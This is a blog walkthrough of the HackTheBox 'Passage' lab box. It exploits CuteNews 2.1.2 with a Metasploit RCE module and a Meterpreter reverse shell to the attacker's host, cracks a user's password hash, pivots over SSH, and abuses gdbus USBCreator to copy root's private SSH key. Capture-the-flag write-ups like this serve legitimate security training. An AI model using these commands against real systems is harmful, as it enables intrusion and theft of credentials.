Passage HackTheBox WalkThrough

This is Passage HackTheBox machine walkthrough. In this writeup, I have demonstrated step by step how I rooted to Passage HTB machine. Before starting let us know something about this machine. It is Linux box with IP address 10.10.10.206 and security level medium assigned by its maker.

First of all, connect your local machine with VPN so that you can access to the lab machines and confirm the connectivity of passage machine by pinging the IP address 10.10.10.206. If all correct then start hacking.

As usual, I began by scanning the IP address so that I could get some starting points. Used nmap for this task and the result is below.

Scanning

$ nmap -sC -sV -oN passage_scan 10.10.10.206

Nmap scan output during Passage HackTheBox WalkThrough

Nmap revealed that port 22 and 80 is open. SSH server is running over port 22 and apache2 web server is running over port 80. As apache web server is running over port 80 so there must be some website hosted on this machine IP. Ongoing to URL http://10.10.10.206/ found a webpage showing Passage News.

Passage Web App Home page

Scrolling to the bottom got information Powered by : CuteNews. Then immediately googled about CuteNews and found that it is an Open Source Content Management System (CMS) for hosting news articles. Since, it is a CMS then there must be some user(s) who write blog post on this website. After spending sometimes got two email address [email protected] & [email protected].

So we have two users namely paul and nadav extracted from their emails. Added them to my notes. And proceeded for further enumeration. Checked the page-source by pressing CTRL+U and found URL http://10.10.10.206/CuteNews that is the installation folder of CuteNews. Ongoing to this page found register & login options and version of running CuteNews is 2.1.2.

Login page of CuteNews CMS found during Passage HackTheBox WalkThrough

As I get some information about any software or CMS then I immediately search for public exploits for that software. So used $searchsploit [a CLI tool to query exploit-db database] for searching exploit of CuteNews 2.1.2.

Searching Public Exploit

$ searchsploit CuteNews 2.1.2

Searching Public exploit for CuteNews 2.1.2 using SearchSploit

There is a Remote Code Execution exploit for CuteNews 2.1.2 and it also has metasploit module. So launched metasploit to exploit this vulnerability. But, when searched for CuteNews in metasploit gave message No results found from search.

Since this module is not present in metasploit-framework so, we have to explicitly, download and add this exploit to our metasploit-framework. The exploit link is https://www.exploit-db.com/download/46698 . Followed the below steps to integrate the module in metasploit.

$msfdb run

msf5 > search cutenews

msf5 > wget 'https://www.exploit-db.com/download/46698'

msf5 > mv 46698 /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb

We have to add comma [,] to this exploit because there is a syntax error in it, see this issue at rapid7 repo.

msf5 > vi /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb

Making Changes to CuteNews Exploit before adding it to Metasploit Framework

After adding the exploit and making changes we have to reload all modules.

msf5 > reload_all

msf5 > search cutenews

Reloading all the Metasploit Module after adding CuteNews RCE exploit in Passage HackTheBox WalkThrough

Now we have successfully added CuteNews RCE exploit to our metasploit-framework. After loading CuteNews module when used msf command $show options, to list available options, it also includes USERNAME & PASSWORD. So CuteNews 2.1.2 has actually an Authenticated RCE vulnerability because it requires username and password too. As we already have a register button at URL http://10.10.10.206/CuteNews so, registered a user by the name test1 & password test1.

Login Page of Cutenews CMS in Passage HackTheBox WalkThrough

It is time to get meterpreter shell. Used the above credential to get shell.

Getting Shell

msf5 > use exploit/unix/webapp/cutenews_avatar_rce

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set RHOSTS 10.10.10.206

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set payload php/meterpreter/reverse_tcp

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set LHOST 10.10.14.191

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set USERNAME test1

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set PASSWORD test1

msf5 exploit(unix/webapp/cutenews_avatar_rce) > set VHOST 10.10.14.191

msf5 exploit(unix/webapp/cutenews_avatar_rce) > exploit

meterpreter > sysinfo

Note: If your meterpreter shell don’t work then background the shell and try to exploit again & again 3-4 times. Even if not works then use unstaged payload php/meterpreter_reverse_tcp instead of staged payload.

Running CuteNews Exploit to get Meterpreter Shell during Passage HackTheBox Writeup

Got meterpreter shell. Upgraded the shell to fully qualified Linux shell so that I could run all linux command remotely.

Upgrading Shell

meterpreter > shell

~python -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm-256color

$ CTRL+Z //to background the shell

$ stty raw -echo

$ fg //plus two times enter to foreground the session

Upgrading Meterpreter Shell to fully qualified Linux Shell

After some enumeration got a file named lines inside directory /var/www/html/CuteNews/cdata/users/. It contains information of all the users in base64 encoded form. After decoding found SHA256 hash of user paul.

$ cat /var/www/html/CuteNews/cdata/users/lines

Base encoded credential of User Paul in file lines
Decoding the Paul credential in Passage HackTheBox WalkThrough

paul : e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

Luckily, got the password from Crackstation for this hash.

Cracking SHA256 hash from crackestation.net

So we have credential paul : atlanta1

Switched the user to paul using the password atlanta1

$ su paul

~atlanta1

Switching the user to Paul using the found credential

Capture User Flag

$ cat user.txt

User Flag captured during Passage HackTheBox WalkThrough

Privilege Escalation

After some initial enumeration found that authorized_keys file of user paul contains key of user nadav. It means user paul can connect to user nadav locally via SSH.

Checking the authorized keys file of user paul

$ ssh nadav@localhost

SSH into passage to user nadav locally

Successfully logged in to nadav through SSH. We are nadav now.

After some, more enumeration did not found any privilege escalation vector. So ran linpeas.sh [a post exploitation enumeration script] for help and it found gdbus could be used to escalate privilege. Did not know how to escalate privilege-using gdbus. So googled privilege escalation using gdbus and got this first article.

According to this article, gdbus allows a user to overwrite arbitrary files on the file system, as root, with no password prompting. Or we can say any user can copy content of root user without any password. So I used this command to copy id_rsa key of root user so that using this key I could SSH to root.

$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key.txt true

$ cat /tmp/key.txt

Copying id_rsa keys of user root by exploiting gdbus in Passage HackTheBox WalkThrough

We have got private key of user root. So copied this key inside the file root_key on my local PC. And after changing the permission of file root_key to 600 connected to root using SSH.

$ vi root_key

$ chmod 600 root_key

$ ssh -i root_key [email protected]

root@passage:~# whoami && id

Login to user root account Using id_rsa key

We have successfully escalated the privilege to root. Now we can capture root flag.

Capture Root Flag

$ cat root.txt

Root flag captured during Passage HackTheBox WalkThrough

This is how I rooted to Passage HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to contact us at [email protected].

You can read walkthrough of similar machine from here.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/